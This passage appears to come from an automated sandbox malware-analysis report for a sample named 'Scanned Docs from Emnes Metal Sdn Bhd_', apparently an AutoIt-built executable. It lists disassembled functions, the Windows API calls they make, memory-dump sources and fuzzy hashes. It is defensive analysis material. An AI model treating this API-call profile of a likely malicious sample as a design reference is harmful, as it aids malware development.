                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002E7206
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002E723C
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002E724D
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002E72CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: 2958ae6011c247c3a0f592e9f5a151b5f1fe3ecffc4db85f25cc11da7637c372
                                                      • Instruction ID: 07f6cf12604e29f084f8a3efe1279ae4f1f5a7d84b13324123500acbdbb69875
                                                      • Opcode Fuzzy Hash: 2958ae6011c247c3a0f592e9f5a151b5f1fe3ecffc4db85f25cc11da7637c372
                                                      • Instruction Fuzzy Hash: E641C071A94245EFDB15CF55C884A9A7BB9EF49310F5080AEFE099F20AD7B0DD50CBA0
                                                      Function 0030C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                      • API String ID: 176396367-4004644295
                                                      • Opcode ID: 844e74d7db04003bd732783742373bcdeb898c70d13fddcdad831f00a7f5cdae
                                                      • Instruction ID: f442dd26a921f6132eec0d8894a05ca4c00705b3094d99179b3b6dc85d01445b
                                                      • Opcode Fuzzy Hash: 844e74d7db04003bd732783742373bcdeb898c70d13fddcdad831f00a7f5cdae
                                                      • Instruction Fuzzy Hash: BD312B33B2216A4BCB23EF6CC8701BF33915BA1750B175219EC456B2C5EA70CD54C7A0
                                                      Function 00312F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00312F8D
                                                      • LoadLibraryW.KERNEL32(?), ref: 00312F94
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00312FA9
                                                      • DestroyWindow.USER32(?), ref: 00312FB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                      • String ID: SysAnimate32
                                                      • API String ID: 3529120543-1011021900
                                                      • Opcode ID: 80662d8cb25452d28577375bbc1674e3b18a39f7550f62e1bc64333ccb98a324
                                                      • Instruction ID: 2763c89bde61ed1e4298c7fd7e4eb101837241ceaa11e461abe39452c6f3d458
                                                      • Opcode Fuzzy Hash: 80662d8cb25452d28577375bbc1674e3b18a39f7550f62e1bc64333ccb98a324
                                                      • Instruction Fuzzy Hash: EC21DC71200209ABEB1A4F64DC84EFB77BDEB5D324F114218F950D60A0C331DCA29760
                                                      Function 002A4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002A4D1E,002B28E9,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002), ref: 002A4D8D
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002A4DA0
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,002A4D1E,002B28E9,?,002A4CBE,002B28E9,003488B8,0000000C,002A4E15,002B28E9,00000002,00000000), ref: 002A4DC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 3a5325152bbd00a09edd0507e0610b31aacc21fd4ecdcdbb0d7c0edd64689abc
                                                      • Instruction ID: 3aff07ce1c7814c44e8ae3bc112df5a492701ed3e9acc499b7942ee1624d7a21
                                                      • Opcode Fuzzy Hash: 3a5325152bbd00a09edd0507e0610b31aacc21fd4ecdcdbb0d7c0edd64689abc
                                                      • Instruction Fuzzy Hash: ABF0C234AA0218FBDB129F94DC49BEDBFB8EF48711F0040A4F905A2260CF709E50CB90
                                                      Function 002DD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32 ref: 002DD3AD
                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002DD3BF
                                                      • FreeLibrary.KERNEL32(00000000), ref: 002DD3E5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                      • API String ID: 145871493-2590602151
                                                      • Opcode ID: 51e5cf0ca6218710ebebf0051292c9a289f2b3417755ca4dd3cf2337b1747447
                                                      • Instruction ID: 325da2bd26bd57aa0eda9ea98673c6b33bae3f33f1605c4f5f45e5f66b0079eb
                                                      • Opcode Fuzzy Hash: 51e5cf0ca6218710ebebf0051292c9a289f2b3417755ca4dd3cf2337b1747447
                                                      • Instruction Fuzzy Hash: 38F05C344F5E12ABD7B71B208C1CD997324AF14701F5594A7FC06E2215D770CCA08A81
                                                      Function 00284E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E9C
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284EAE
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00284EDD,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284EC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 16d158510ebe3f048cc2769a894685a65a405215835bdbbc196feda461ded069
                                                      • Instruction ID: f4392bc0279d85ce606a432c2abbda82851e968ce8886327c24b215026870e7e
                                                      • Opcode Fuzzy Hash: 16d158510ebe3f048cc2769a894685a65a405215835bdbbc196feda461ded069
                                                      • Instruction Fuzzy Hash: 35E0CD39AB35236BD2333F256C18BDFA69CAF85F62F055125FC01E3140DB60CD1141A0
                                                      Function 00284E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E62
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284E74
                                                      • FreeLibrary.KERNEL32(00000000,?,?,002C3CDE,?,00351418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00284E87
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: fe0c6d0d793b9904aca06dd4ae6da964b7f925e5221a8fab5de607d07e0e09f9
                                                      • Instruction ID: 50e33c5f83ae63a76e373d1142d4fd4a3d18809dd15606a653b399383cf4bc9e
                                                      • Opcode Fuzzy Hash: fe0c6d0d793b9904aca06dd4ae6da964b7f925e5221a8fab5de607d07e0e09f9
                                                      • Instruction Fuzzy Hash: 73D012395A36236756233F256C18DCB6A1CAF89B517059525F905E6154CF60CD1186D0
                                                      Function 0030A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 0030A427
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0030A435
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0030A468
                                                      • CloseHandle.KERNEL32(?), ref: 0030A63D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: d040b8ce3aeb6c81efdd19da1a982bc6866a1191b681ab5d71d66ecc6c5fd72d
                                                      • Instruction ID: 9984f56a8f31cddb03aa4f3db35ac34b55d006cf25d903fa8dba6c5f6c5c6c5b
                                                      • Opcode Fuzzy Hash: d040b8ce3aeb6c81efdd19da1a982bc6866a1191b681ab5d71d66ecc6c5fd72d
                                                      • Instruction Fuzzy Hash: 6DA1E075615700AFE720EF24D896F2AB7E5AF84714F14881DF59A8B2D2C7B0EC108B92
                                                      Function 002EE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002ECF22,?), ref: 002EDDFD
                                                        • Part of subcall function 002EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002ECF22,?), ref: 002EDE16
                                                        • Part of subcall function 002EE199: GetFileAttributesW.KERNEL32(?,002ECF95), ref: 002EE19A
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 002EE473
                                                      • MoveFileW.KERNEL32(?,?), ref: 002EE4AC
                                                      • _wcslen.LIBCMT ref: 002EE5EB
                                                      • _wcslen.LIBCMT ref: 002EE603
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 002EE650
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: ad14b895dd10e369df9221176b5285c4e98b61f8cb220c35821f2d627dd9aa0b
                                                      • Instruction ID: a8dd2c37ef342c7c1495c55957b3340864034f4f6dda7e995986685f6eb4e5ef
                                                      • Opcode Fuzzy Hash: ad14b895dd10e369df9221176b5285c4e98b61f8cb220c35821f2d627dd9aa0b
                                                      • Instruction Fuzzy Hash: E051C6B24583855BCB24EF90CC819EFB3ECAF85340F40491EF689D3191EF74A5988B66
                                                      Function 0030B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00289CB3: _wcslen.LIBCMT ref: 00289CBD
                                                        • Part of subcall function 0030C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0030B6AE,?,?), ref: 0030C9B5
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030C9F1
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA68
                                                        • Part of subcall function 0030C998: _wcslen.LIBCMT ref: 0030CA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0030BAA5
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0030BB00
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0030BB63
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 0030BBA6
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0030BBB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 86c032474946ca27ff9fade579d00d5fd27dcca705fa5f27de8b32242b7caae7
                                                      • Instruction ID: 08677434f8f96f7e473712555591d14666836fe11695f7c763a10be6afcd1de3
                                                      • Opcode Fuzzy Hash: 86c032474946ca27ff9fade579d00d5fd27dcca705fa5f27de8b32242b7caae7
                                                      • Instruction Fuzzy Hash: 4361BF31219241AFD315DF24C4A0E2ABBE9FF88308F54855DF4998B2E2DB31ED45CB92
                                                      Function 002E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 002E8BCD
                                                      • VariantClear.OLEAUT32 ref: 002E8C3E
                                                      • VariantClear.OLEAUT32 ref: 002E8C9D
                                                      • VariantClear.OLEAUT32(?), ref: 002E8D10
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002E8D3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 8d60ec96a562b97807cb53693ee5eeff1883617c308729c726e3cbfe581f0a80
                                                      • Instruction ID: ec43860658d1b0cee7b11e7066a41a49b5220a7ababc02d9c43aa64298732bfa
                                                      • Opcode Fuzzy Hash: 8d60ec96a562b97807cb53693ee5eeff1883617c308729c726e3cbfe581f0a80
                                                      • Instruction Fuzzy Hash: 6B517B75A10219DFCB14CF69C884AAAB7F9FF8D310F118559E949DB350E730E911CB90
                                                      Function 002F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002F8BAE
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 002F8BDA
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002F8C32
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002F8C57
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002F8C5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: af7ccfad21df58da176273f1bd0c7dc52321550cfcd208caa2e38ccd7602deb6
                                                      • Instruction ID: c745dbe2ac0c2a94784eb46fabbb937507228931d456bab1cfcfdff1c4ccc61e
                                                      • Opcode Fuzzy Hash: af7ccfad21df58da176273f1bd0c7dc52321550cfcd208caa2e38ccd7602deb6
                                                      • Instruction Fuzzy Hash: 9C514D35A102199FDB05DF64C880A6DBBF5FF48314F188459E949AB3A2CB35ED61CFA0
                                                      Function 00308EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00308F40
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00308FD0
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00308FEC
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00309032
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00309052
                                                        • Part of subcall function 0029F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,002F1043,?,753CE610), ref: 0029F6E6
                                                        • Part of subcall function 0029F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,002DFA64,00000000,00000000,?,?,002F1043,?,753CE610,?,002DFA64), ref: 0029F70D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                      • String ID:
                                                      • API String ID: 666041331-0
                                                      • Opcode ID: b9deb77a06a3013878003f5766a2173cba678a78bf3076a00311b888efc09d77
                                                      • Instruction ID: be8ed860bd403ca3044599c2c8d31dd7832d35fe852900ee1b3f6add01970568
                                                      • Opcode Fuzzy Hash: b9deb77a06a3013878003f5766a2173cba678a78bf3076a00311b888efc09d77
                                                      • Instruction Fuzzy Hash: 47515E38602205DFC712EF68C4949ADBBF5FF49314B0980A9E8459B7A2DB31ED85CF90
                                                      Function 00316B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00316C33
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00316C4A
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00316C73
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,002FAB79,00000000,00000000), ref: 00316C98
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00316CC7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: 4a9a385921c50ed1482c149e6742d4d2bd9e6abbea2abbcb0cc5a745da642f1c
                                                      • Instruction ID: 28cf186a330eee53eaf14d9a3201585d3c4331830938c3274d23534313c37480
                                                      • Opcode Fuzzy Hash: 4a9a385921c50ed1482c149e6742d4d2bd9e6abbea2abbcb0cc5a745da642f1c
                                                      • Instruction Fuzzy Hash: 6D41E835604104AFD72ACFA8CC56FE97BA9EB0D350F164268F895A72E0C371ED91CAD0
                                                      Function 002B2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
